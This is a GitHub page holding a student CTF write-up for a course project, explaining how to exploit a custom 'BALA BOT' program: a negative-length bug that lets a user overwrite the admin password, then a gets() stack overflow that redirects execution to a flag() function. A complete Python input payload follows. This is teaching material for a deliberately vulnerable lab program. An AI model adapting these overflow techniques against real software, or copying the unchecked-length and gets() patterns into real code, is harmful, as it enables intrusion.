-
Notifications
You must be signed in to change notification settings - Fork 0
/
writeup.txt
81 lines (65 loc) · 3.11 KB
/
writeup.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
Reverse Engineering CTF Final Project
Lu Cao, Joey Mathis, Rong Wang
Our group created a multi-part CTF project. The script that was written revolves around a game service where the user interacts
with a robot called BALA BOT. The user begins as the guest user. The goal of the project is to call the flag() function which will
print a nice surprise for the user.
Included Files: program, program.c, payload.py, passwords.h
It would be our intention to give the CTF player program and program.c, as passwords.h contains the flag.
This project is also hosted at https://github.com/jmathis99/revenge-ctf.
Part 1
The first part of the exploit is to realize that there is an error within the change_description() function. The way the program
deals with negative lengths is incorrect. When a negative length is entered, the function will simply multiply the length by the
negative number and not bounds check the result. Thus, we can change the description length to be longer 128 bytes. The next thing
to notice is that there is an array that stores 5 user objects and that these users are located in contiguous memory. Furthermore,
the admin user is always the 4th user in the array. Admin privileges are not required to make users. Thus, as the guest, we can make
three users and then login as the 3rd user. From there, we can overwrite the description length of the 3rd user which allows us to
overflow the description buffer of the 3rd user and change the admin password to something we know.
Part 2
Once we overwrite the admin password, we can call the login() function to log back in as the admin with the new password. If we look
at what other functions are available to us, we see that there is a chat() function that allows the user to interact with the
BALA BOT. Interacting with the BALA BOT requires admin privileges. Since we are now the admin user, we can do this. Notice that
the BALA BOT gets user input using the gets() functioin. As we have learned, gets() is not secure because it does not check the length
of the user input. Thus, we can overflow the local buffer buf, which is stored on the stack, and overwrite the return address of chat()
so that execution goes to the flag() function.
The following is the payload for a 64 bit system.
# use python3
# Create user 1
print("0")
print("user1")
print("user1")
print("user1")
# Create user 2
print("0")
print("user 2")
print("user 2")
print("user 2")
# Create user 3
print("0")
print("user 3")
print("user 3")
print("user 3")
# login as user 3
print("7")
print("user 3")
print("user 3")
# overwrite the description length
print("3")
print(-200)
# develop our payload which will overflow from user 3 and change the admin password
payload = ""
payload += "A" * 132
payload += "bala"
payload += "\x00"
payload += "A" * 27
payload += "pass1234"
payload += "\x00"
print(payload)
# log in as the admin with the newly changed password
print("7")
print("bala")
print("pass1234")
# call the chat function which has a buffer overflow vulnerability
print("1")
print()
# overwrite the return addrses with the address of the flag() function
print('A' * 135 + '\x96\x12\x40\x00\x00\x00\x00\x00\x00\x00\x00')